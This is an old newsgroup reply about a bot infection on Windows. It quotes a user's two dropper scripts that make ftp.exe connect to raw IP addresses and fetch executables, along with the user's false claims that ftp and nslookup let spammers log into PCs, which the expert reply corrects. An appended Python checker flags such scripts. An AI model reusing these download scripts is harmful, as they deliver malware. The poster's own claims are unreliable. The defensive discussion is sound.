Re: *** VIRUS WARNING!!! ***
- From: "David H. Lipman" <DLipman~nospam~@Verizon.Net>
- Date: Mon, 31 Mar 2008 20:49:48 -0400
From: "Terry Mester" <TerryMester@xxxxxxxxxxxxxxxxxxxxxxxxx>
| I have discovered how Spammers are able to access people's Computers to spew
| out their Spyware garbage, and it is Microsoft's OS which has made this
| possible! Spammers utilize two commands: the "nslookup" Command and the
| "ftp" Command found in c:\winnt\system32 -- which you can review in the
| Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
| Computer while logged onto the Internet to download a Virus. Those E-Mails
| you get from friends telling you to forward it on to others, in order to get
| good luck or money, are nothing but a SCAM perpetrated by the Spammers!
| DELETE those E-Mails -- DO NOT open them!!! Last month after separately
| opening two of those E-Mails, I ended up with a Virus on my Computer spewing
| out data over the Internet, and also the following two Text Files given the
| name "i" under the 'winnt' Directory.
| --- \winnt\i
| open 136.145.69.79 2755
| user 1 1
| get kp.exe
| quit
| --- \winnt\i
| open 208.111.5.228 2755
| user 1 1
| get 2k3.exe
| quit
| ---
| The Virus Commands I subsequently found under the 'winnt' or 'system32'
| Directories corresponded to the two ".exe" Files named in those two Text
| Files. I didn't know where those 4 Command Lines in those "i" Files were
| executable until just today when I looked up the "ftp" Command in Help.
| Those are 4 sub-commands which caused my Computer to open up the said IP
| Address and Port#, log in as the user 1 1, download the Virus Command, and
| then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
| wrong because this immediately clogged up my Internet Connection. A High
| Speed user might not notice anything!
|
| It is unbelievable, but the "ftp" Command enables the Spammer to log onto
| your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
| Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
| not kidding! Further still, the "nslookup" Command enables the Spammer to
| find out your IP Numbers and Computer ID so that he can use the "ftp"
| Command! It is as if Microsoft specifically designed these two Commands to
| help Spammers! As far as I can tell, you cannot disable either of these
| Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
| "nslookup.exe.rename" in order to make them non-executable, but I don't think
| this will solve the problem. Would a Microsoft Corporation technician please
| inform us if these two Command functions can be disabled? If not, Microsoft
| needs to IMMEDIATELY provide a Service Pack or update to enable these two
| functions to be disabled using the "net stop / start" Command. With these
| functions disabled, a Firewall Application becomes completely unnecessary!
This is NOT new and is well known in the anti malware community.
What you have described is a BOT action. If it is on the PC, the PC is already infected.
The infector creates a script and uses the FTP command to download its peer software. A
batch file then uses the script to automate the FTP process.
If file protection is properly working, you can not rename FTP.EXE as it will just reinstate
itself.
NSLOOKUP has nothing to do with it.
What this shows is that you did not have anti virus installed and/or properly updated.
BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no
patch because you have to be infected first before the FTP.EXE command will be used
maliciously. You should also know there are Trojans that hijack the BITS Service to download
peers.
--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
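
An added example, not part of either post: a small Python check that parses a text file as ftp.exe sub-commands and flags the pattern seen in the quoted `i` files (raw IP address, non-default port, executable download). The function names, the extension list, the two-indicator threshold and the benign sample are assumptions made for illustration.

```python
import re

# Assumed list of extensions an unattended FTP fetch has no routine reason to pull.
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".dll")
IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def parse_ftp_script(text):
    """Parse ftp.exe sub-commands (one per line) into a summary dict."""
    summary = {"host": None, "port": 21, "user": None, "gets": []}
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            summary["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                summary["port"] = int(args[1])
        elif cmd == "user" and args:
            summary["user"] = args[0]
        elif cmd in ("get", "recv") and args:
            summary["gets"].append(args[0])   # first argument is the remote file
        elif cmd == "mget":
            summary["gets"].extend(args)      # every argument is a remote file
    return summary

def suspicious_indicators(text):
    """Return the list of dropper-style indicators found in an FTP script."""
    s = parse_ftp_script(text)
    reasons = []
    if s["host"] and IPV4.match(s["host"]):
        reasons.append("connects to a raw IP address")
    if s["host"] and s["port"] != 21:
        reasons.append("non-default FTP port %d" % s["port"])
    exes = [g for g in s["gets"] if g.lower().endswith(EXECUTABLE_EXT)]
    if exes:
        reasons.append("downloads executable: " + ", ".join(exes))
    return reasons

def is_dropper_script(text):
    """Assumed threshold: two or more indicators together mark the file for review."""
    return len(suspicious_indicators(text)) >= 2

# First script quoted in the post above (the \winnt\i file).
POST_SAMPLE = "open 136.145.69.79 2755\nuser 1 1\nget kp.exe\nquit\n"
# Constructed benign script for contrast.
BENIGN_SAMPLE = "open ftp.example.org\nuser anonymous guest\nget README.txt\nquit\n"

if __name__ == "__main__":
    for name, sample in (("post", POST_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, is_dropper_script(sample), suspicious_indicators(sample))
```

Run over small extensionless text files in the Windows and system32 directories, a check like this surfaces the staging script even after the downloaded executable has been renamed or removed.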